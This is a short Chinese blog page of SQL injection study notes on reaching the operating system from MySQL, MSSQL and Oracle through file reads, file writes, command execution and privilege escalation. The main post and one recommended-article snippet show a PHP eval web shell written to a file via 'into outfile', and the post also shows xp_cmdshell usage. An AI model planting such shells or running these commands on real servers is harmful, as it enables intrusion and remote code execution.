SQL之利用操作系统

最新推荐文章于 2022-07-11 11:43:43 发布
最新推荐文章于 2022-07-11 11:43:43 发布
阅读量696 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Liuhuaijin/article/details/77197816
版权

 一访问文件系统
读文件:
MySQL:可以使用load data infile和load_file()函数读取文件,其中load_file()可以直接读取结果:select load_file('c:\1.txt');
MSSQL:可以使用bulk insert复制文件到数据库表中:bulk insert table from 'c:\1.txt';和读取文件:select * from table;
Oracle:可以使用Oracle Directory, Oracle Text读取文件
写文件:
MySQL:使用select into outfile(dumpfile)写入文件,例如:select '<? php eval($_POST['Jim']);?>' into outfile 'C:/2.txt';
MSSQL:使用xp_cmdshell扩展存储过程写入文件,例如:exec xp_cmdshell 'echo table 1>c:\test.txt' 
Oracle:使用utl_file, DBMS_ADVISOR, Java实现文件写入
二.执行操作系统命令
1.MySQL不支持执行shell命令
2.Oracle
extproc、Java和DBMS_SCHEDULER是oracle运行操作系统命令的正式方法
3.MSSQL
xp_cmdshell只接收一个参数

三.提升权限(获取管理员权限):
1.SQL Server
openrowset命令:SQL Server 2000上,所有用户均可调用openrowset, 而在SQL Server 2005上,该操作默认被禁用
2.Oracle
在Oracle中,通过web应用的SQL注入来提升权限非常困难。大多数提升权限的方法均需要PL/SQL注入。

玄瞋
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入2————对系统文件的操作
网络设备配置-华为
06-04 549
上一篇文档介绍了sql注入的一些原理和查询方式,这一篇算是作为一个拓展思路;并且这里重新介绍一种工具burpsuite,虽然也是利用url提交,但是更简洁一些 burpsuite准备 1、我们现在sql注入界面截断代理,随机提交一个参数;然后转向burp选择正确的请求;然后发送到repeater(如下图); 2、在repeater下选择params可以直接更改参数重复提交验证; 读取文件(假设...
sql注入操作系统_OSQuery:使用SQL探索您的操作系统
culi3118的博客
08-21 414
sql注入操作系统If the title sounds like a confusing hoax, that’s understandable – but it’s very, very real. In an announcement on October 30th, Facebook released OSQuery – a new way to inspect the current s...
在PL/SQL中执行操作系统的命令
cqbh2011的博客
04-27 282
There is no direct way to execute operating system commands from PL/SQL. PL/SQL doesn't have a "HOST" command, lik...
sqlplus中使用帮助系统
数据库
01-08 125
① 以system用户登入 ② 到/u01/app/oracle/product/10.2.0/db_1/sqlplus/admin/help 执行helpbld.sql 这时会有两个输入值 第一个是:/u01/app/oracle/product/10.2.0/db_1/sqlplus/admin/help 第二个是:执行help.sql ...
SQL执系统操作指令
lizhongwa的博客
09-15 172
******************************作业备份执行语句 declare @name varchar(250) set @name='D:\lizhongwa\leadyoo'+ convert(varchar(50),getdate(),112)+'.bak' BACKUP DATABASE [MisFrameWork] TO   DISK = @name WITH NOF...
易语言API利用sql操作Access数据库源码
06-02
API是操作系统或库提供的接口,开发者可以利用这些接口执行特定任务,如数据库操作。 Access数据库是微软公司开发的一种关系型数据库管理系统,广泛应用于小型项目中。它支持SQL(结构化查询语言),这是一种用于...
SQLServer仓库管理系统
最新发布
06-03
通过实现一个基于SQLServer的仓库管理系统,可以极大地提高数据处理的准确性和操作的效率,减少人力资源的浪费,同时提升整体库存管理的自动化水平。 系统设计与功能: 使用C#作为开发语言,结合SQLServer数据库,...
Osquery:SQL 操作系统检测和监控框架-开源
07-08
这允许您编写 SQL 查询来探索操作系统数据。 使用 osquery,SQL 表代表抽象概念,例如正在运行的进程、加载的内核模块、打开的网络连接、浏览器插件、硬件事件或文件哈希。 Osquery 像数据库一样查询您的设备。 ...
Osquery:SQL操作系统检测和监视框架-开源
05-14
这使您可以编写SQL查询来浏览操作系统数据。 使用osquery,SQL表代表抽象概念,例如正在运行的进程,已加载的内核模块,打开的网络连接,浏览器插件,硬件事件或文件哈希.Osquery像数据库一样查询您的设备。 ...
sqlserver中如何使用操作系统的文件?如何读写文件?--抄录
ycs_wokao的博客
06-02 178
请问在sqlserver中如何使用操作系统的文件?如何读写文件? DECLARE @object int DECLARE @hr int DECLARE @src varchar(255), @desc varchar(255) Declare @tmp int declare @msg varchar(3000) SET @msg=‘Hello...
常用SQL操作命令
ivyylu的博客
11-06 187
下列语句部分是Mssql语句,不可以在access中使用。   SQL分类:   DDL—数据定义语言(CREATE,ALTER,DROP,DECLARE)   DML—数据操纵语言(SELECT,DELETE,UPDATE,INSERT)   DCL—数据控制语言(GRANT,REVOKE,COMMIT,ROLLBACK)   首先,简要介绍基础语句:   1、说明:创建数据库 CREATE D...
sql查询基本操作指令
Pichairen
08-19 1350
1、基本查询 -- 数据的准备 -- 创建一个数据库 create database python_test charset=utf8; -- 使用一个数据库 use python_test; -- 显示当前使用的数据库 select database(); -- 显示数据库的创建方式 show create databas...
SQL语句汇总
guaiguaigirlma的专栏
09-12 314
1) rank()函数主要用于排序,并给出序号 dense_rank():功能同rank()一样,区别在于,rank()对于排序并的数据给予相同序号,接下来的数据序号直接跳中跃,dense_rank()则不是 row_number()涵数则是按照顺序依次使用,相当于我们普通查询里的rownum值 比如数据: 1,2,2,4,5,6。。。这是rank()的形式  1,2,2,3,
SQL数据库操作命令大全
热门推荐
奕隆的博客
07-11 1万+
目录一、基础二、提升三、技巧四、数据开发五、SQL Server基本函数六、常识1、说明:创建数据库CREATE DATABASE database-name2、说明:删除数据库drop database dbname3、说明:备份sql server 4、说明:创建新表create table tabname(col1 type1 [not null] [primary key],col2 type2 [not null],..)根据已有的表创建新表: A:create table tab_new l
SQLPlus中执行操作系统命令
first10010的专栏
10-09 4045
Linux:命令前面加上!或hostWindows:命令前面加上$或host
在PL/SQL中执行操作系统命令
cldh1492的博客
06-28 529
首先创建java source create or replace and compile java source named execsyscmd as import java.io.*; ...
在Mysql中执行系统命令mysql提示符下执行操作系统命令
qq_45844443的博客
10-27 2987
在Mysql中执行系统命令mysql提示符下执行操作系统命令 实现方法: 在mysql提示符下,输入system后面接要执行的操作系统命令就可以了。 system (commands); 例子: system pwd; system ls; system ll; 但是这样的使用无法在window下使用(本人测试为只有linux环境下才可以) ...
sql注入--高权限,load_file读写文件
diecai2192的博客
05-01 2591
select '<?php eval($_POST[123]) ?>' into outfile '/var/www/html/1.php'; 1.MYSQL新特性限制文件写入及替代方法 高版本的MYSQL添加了一个新的特性secure_file_priv,该选项限制了mysql导出文件的权限 secure_file_priv选项 secure_file_priv   ...
ASP+SQL操作系统学习社区:构建互动教学平台
"基于ASP+SQL操作系统学习社区网站设计与实现" 本文介绍了一个采用ASP(Active Server Pages)和SQL Server 2000数据库技术构建的学习社区网站,旨在提供一个互动式操作系统学习平台。该社区网站利用网页设计工具...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值